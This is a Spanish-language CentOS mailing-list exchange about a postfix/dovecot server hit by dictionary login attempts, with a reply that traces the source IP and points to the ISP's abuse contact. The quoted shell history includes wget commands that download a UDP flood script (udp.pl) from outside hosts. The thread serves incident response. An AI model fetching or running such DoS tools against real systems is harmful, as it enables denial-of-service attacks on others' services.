[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

Francesc Guitart francesc.guitart en enise.fr
Vie Mar 22 08:32:03 UTC 2013 

Hola,

Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit :
> Buenos días a todos de la lista:
> Primero que nada les cuento la experiencia que estoy  pasando  con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado  que el  servidor a las 5:00PM  es atacado/escaneado  o  algo  asi  tratando de conectarse al  dovecot especificamente ,les posteo  lo que sale...--------------------- pam_unix Begin
> ------------------------
>
>    dovecot:
>
>      Authentication
> Failures:
>
>         contacto
> rhost=66.142.38.137 : 88 Time(s)
>
>

[...]

>         turismo
> rhost=66.142.38.137 : 57 Time(s)        ..........       .................        ............(hay mas resgisto q no lo pongo  es bastante todos salen de la misma ip)        Unknown Entries:
>
>         check pass;
> user unknown: 3901 Time(s)
> Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o  bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y  donde se ejecuta, pero  si  averigue que hicieron y  que se bajaron para realizar esto.
> el cual detallo, yo  uso  un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto  y  hizo eso, (lo saque del  history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit
> El detalle es que desde ese momento ya tengo  el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal  de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y  siempre se ejecuta a esa hora?? o  es un scaneo  externo.
> Saludos
> Luis Roman
>

Como te ha respondido José Fernández los logs muestran intentos de 
conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL 
de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, 
que a su vez parece ser propiedad de AT&T:

adsl-66-142-38-137.dsl.kscymo.swbell.net

Si siempre es esta IP la que trata de acceder a tu servidor contacta con 
ellos, tienen una cuenta de correo para estos casos. Escríbeles a 
abuse en swbell.net y explícales el problema. Deberían poner remedio.

http://public.swbell.net/contact.html

Saludos.


-- 
Francesc Guitart

Más información sobre la lista de distribución CentOS-es